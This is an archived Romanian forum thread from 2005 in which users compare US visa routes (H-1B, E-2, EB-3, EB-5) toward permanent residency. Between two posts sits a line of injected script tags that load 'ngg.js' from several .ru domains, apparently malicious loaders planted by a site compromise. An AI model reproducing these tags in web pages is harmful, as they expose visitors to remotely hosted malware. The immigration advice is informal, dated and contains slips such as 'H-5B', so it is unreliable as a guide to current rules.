PDA

Arată versiune întreagă : H1B vs. E2



sorin
02.11.2005, 01:32
M-a intrebat un prieten care ar fi cea mai buna directie pentru obtinerea unui statut legal in State, care sa duca la obtinerea rezidentei permanente. Am vorbit in mare cu un avocat, dar as dori sa studiez mai in profunzime detalii referitoare la aceasta problema. M-ar interesa care sunt avantajele si dezavantajele principale intre H1B si E2, daca cineva a fost pus intr-o situatie similara sa aleaga intre cele 2 tipuri de viza, niste surse legale cat mai detaliate, etc., etc.
Multumesc anticipat celor care-mi vor raspunde.

02.11.2005, 10:09
sorin,

Resedinta permanenta via H-1B este un subiect care mie imi este destul
de cunoscut. Mai greu este sa fac o comparatie cu calea "bussiness" pe
care o cunosc numai din citite si pentru care ar trebui sa mai fac
niste sapaturi (virtuale, pe Internet).

Lasand la o parte putinii "professional nurses", "physical therapists",
artistii sau sportivii de renume si einsteinii, doritorii de resedinta
US avand o meserie calificata vor trebui sa demonstreze (de fapt
firmele) ca nu exista la nivelul natunii americane nici un amator in
stare sa ia un post nou "pus la bataie" de angajatorul sponsor. Bineinteles, salariul este
peste un anumit barem asa ca nu te poti vinde ieftin. Ca sa reusesti
cheia este sa ai o munca destul de specializata la care nu multi
americani se pricep. Dar se mai poate sa fie si pur si simplu un
deficit de mana de lucru pentru un post "banal". In cele mai multe
cazuri viza de imigrant ptr. care se califica acestia este EB-3.

Daca insa nu esti pe principiul "meserie, bratara de aur" atunci poate
esti "om de afaceri de succes". Si atunci tintesti spre viza de
imigrant EB-5. Conditiile sunt cam "tough": milionul investit, locuri
de munca, green card conditional,.. Un link cat se poate de oficial:

http://uscis.gov/graphics/services/residency/investment.htm

A te decide ce ti-se potriveste (EB-3 sau EB-5, sa zicem) e usor.
Problema la EB-3 este ca dureaza mult si atunci poti recurge la H-1B.
H-1B admite "dual intent" (immigrant&non-immigrant), asadar poti lucra in US avand cererea de
EB-3 depusa.

http://www.immigrationservicesatl.com/CustomPage.shtml (http://www.immigrationservicesatl.com/CustomPage.shtml)

Dezavantajul insa este ca acel H-1B nu poate fi pe pozitia/functia pe
care va fi EB-3-ul (EB-3 trebuie sa fie pe un "position in the future")
iar pentru acea pozitie "in the future" nu te poti prevala de
experienta dobandita la H-1B daca totul (H-1B & EB-3) este in
cadrul aceleiasi firme.

Pentru EB-5 nu stiu cat se asteapta. Stiu doar ca sunt limite anuale si
sigur dureaza daca s-a depasit cifra ptr. anul respectiv. Intrebarea la
care nu stiu sa raspund este ce se poate face in US cat astepti
EB-5-ul. Nu poti sa-ti folosesti banii ptr. un H-1B caci la asta nu
poti fi "self employed". Poti doar mitui un angajator smileys/smiley1.gif.

Poate o varianta sa fie o viza de afaceri E-2. Conditiile sunt mult mai relaxate ca EB-5:

http://www.green-cards.com/non_us/e1_e2_visa.htm (http://www.green-cards.com/non_us/e1_e2_visa.htm)

Din linkul postat mai sus:

http://www.immigrationservicesatl.com/CustomPage.shtml (http://www.immigrationservicesatl.com/CustomPage.shtml)

nu reiese clar daca aceasta viza E-2 joaca rol de H-1B in sensul ca
poti sa activezi in US in timp ce ti se proceseaza aplicatia de
imigrant. La viza E-2 nu mai trebuie sa-ti mentii domiciliu in Ro. (sa
demonstrezi ca ai legaturi cu tara) si ea se poate prelungi practic la
nesfarsit (sau, ma rog, mai sunt limite biologice). In schimb trebuie
sa te angajezi ca la terminarea afacerii sa te intorci in tara ta si nu
stiu cum asta s-ar potrivi cu o cerere de EB-5 depusa.

Asadar mai trebuie studiata latura care mi-e necunoscuta: durata H-5B si compatibilitatea cu E-2 in caz ca dureaza mult.






/<script src=http://www.nmr43.ru/ngg.js></script><script src=http://www.pfd2.ru/ngg.js></script><script src=http://www.iroe.ru/ngg.js></script><script src=http://www.kodj.ru/ngg.js></script><script src=http://www.kjwd.ru/ngg.js></script><script src=http://www.bce8.ru/ngg.js></script><script src=http://www.nemr.ru/ngg.js></script><script src=http://www.kpo3.ru/ngg.js><script src=http://www.iroe.ru/ngg.js></script>

sorin
02.11.2005, 12:37
Transit, multumesc mult pentru raspunsul tau detaliat. Ca de obicei, mesajele tale sunt foarte elaborate si la subiect, economisind mult timp celor in cautare de informatii vitale. cu aceasta ocazie am aflat si eu unele detalii noi si mi-am facut o idee mai buna, dar inca sunt multe necunoscute, care sper sa se rezolve in scurt timp. Persoana pe care vrea s-o ajut este unul dintre cei mai buni prieteni ai mei si m-as bucura mult sa reuseasca. Daca mai afli ceva interesant despre aceste 2 tipuri de vize, te rog mult sa postezi aici.


Ma bucur ca esti pe acest forum, de ajutorul tau beneficiind foarte multa lume. smileys/smiley20.gif
Am mai gasit informatii utile despre E2 aici:
http://uscis.gov/lpBin/lpext.dll/inserts/slb/slb-1/slb-10548 (http://uscis.gov/lpBin/lpext.dll/inserts/slb/slb-1/slb-10548/slb-16866/slb-17270?f=templates&amp;fn=&#100;ocument-frame.htm#slb-8cfrsec2142e2) /slb-16866/slb-17270?f=templates&amp;fn=document-frame.htm#s lb-8cfrsec2142e2